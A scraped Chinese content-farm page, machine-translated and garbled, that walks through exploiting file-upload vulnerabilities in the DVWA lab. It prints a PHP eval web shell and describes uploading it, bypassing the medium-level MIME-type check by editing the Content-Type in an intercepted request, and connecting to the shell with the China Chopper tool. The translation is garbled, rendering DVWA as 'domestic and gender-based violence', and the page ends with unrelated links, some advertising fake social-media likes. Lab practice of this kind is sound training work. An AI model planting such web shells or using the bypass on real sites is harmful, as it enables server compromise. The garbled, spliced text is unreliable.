大数据中如何进行文件上传漏洞的分析

技术大数据中如何进行文件上传漏洞的分析今天就跟大家聊聊有关大数据中如何进行文件上传漏洞的分析,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。一、环境:dvwa二、选

今天跟大家聊聊大数据中的文件上传漏洞如何分析,可能很多人都不太懂。为了让大家更好的了解,边肖为大家总结了以下内容,希望大家能从这篇文章中有所收获。

一.环境:家庭暴力和基于性别的暴力

第二,选择上传,低级。

1.上传1.php文件和1.jpg文件没有问题。

PHP文件的内容是:

?PHP @ eval($ _ POST[' ABC ']);

大数据中如何进行文件上传漏洞的分析

大数据中如何进行文件上传漏洞的分析

2.访问我们上传的文件

http://192 . 168 . 152 . 188/dvwa/hackable/uploads/1 . jpg

你可以看到图片。

http://192 . 168 . 152 . 188/dvwa/hackable/uploads/1 . PHP

我什么都看不见。

3.用菜刀链接1.php文件,然后单击添加。

大数据中如何进行文件上传漏洞的分析

大数据中如何进行文件上传漏洞的分析

4.双击链接进入

大数据中如何进行文件上传漏洞的分析

第三,选择上传,中等水平。

1.上传2.php文件和2.jpg文件,发现2.php无法上传。

2.单击查看来源。

大数据中如何进行文件上传漏洞的分析

3.这里限制了上传类型,可以通过抓取包来修改上传类型。

大数据中如何进行文件上传漏洞的分析

4.我们将文本/纯文本更改为图像/jpeg,并成功上传。

大数据中如何进行文件上传漏洞的分析

5.把它和菜刀联系起来。

大数据中如何进行文件上传漏洞的分析

第四,选择上传,高水平。

看完以上内容,你对如何分析大数据中的文件上传漏洞有了更深入的了解吗?如果您想了解更多知识或相关内容,请关注行业资讯频道,感谢您的支持。

内容来源网络,如有侵权,联系删除,本文地址:https://www.230890.com/zhan/141267.html

(0)

相关推荐

  • 有哪些Go加密解密算法

    技术有哪些Go加密解密算法这篇文章主要讲解了“有哪些Go加密解密算法”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“有哪些Go加密解密算法”吧!md5MD5信息摘要算法是一

    攻略 2021年10月27日
  • 抖音刷赞网,抖音刷赞网站推广永久?

    技术抖音刷赞网,抖音刷赞网站推广永久?抖音点赞、抖音粉丝、抖音评论、抖音播放是怎么刷合适?如今越来越多的人都会玩抖音,因为抖音里面有特别多有趣的内容,很多的用户会去把自己生活当中比较有趣的一些生活经验或者是生活经历发在抖

    测评 2021年11月10日
  • ASP.NET数据库连接的实例分析

    技术ASP.NET数据库连接的实例分析这篇文章给大家介绍ASP.NET数据库连接的实例分析,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。ASP.NET数据库连接实例展现: using System;

    攻略 2021年12月1日
  • 馒头和米饭哪个含糖量高,吃面包和馒头哪个升糖快

    技术馒头和米饭哪个含糖量高,吃面包和馒头哪个升糖快在相同情况下相比馒头和米饭哪个含糖量高,升糖速度:馒头>面包(白吐司)>米饭。这是为什么呢?
    在这里我就要介绍一个反应食物升糖快慢的数值叫
    GI值(血糖生成指数):指含等

    生活 2021年10月31日
  • eth私有节点搭建

    技术eth私有节点搭建 eth私有节点搭建一.单节点的搭建1.从github上下载源码git clone https://github.com/ethereum/go-ethereum.git2.源码编

    礼包 2021年12月20日
  • 抖音能刷粉吗,便宜刷抖音网站?

    技术抖音能刷粉吗,便宜刷抖音网站?首先,抖音刷粉是不违规的。这在行业内已经属于潜规则了。很多网红公司都在使用这类辅助工具。目前这类辅助工具,不违规,也不违法。可以放心使用。但是需要找到靠谱的代刷网,否则很可能被坑钱财。

    测评 2021年10月19日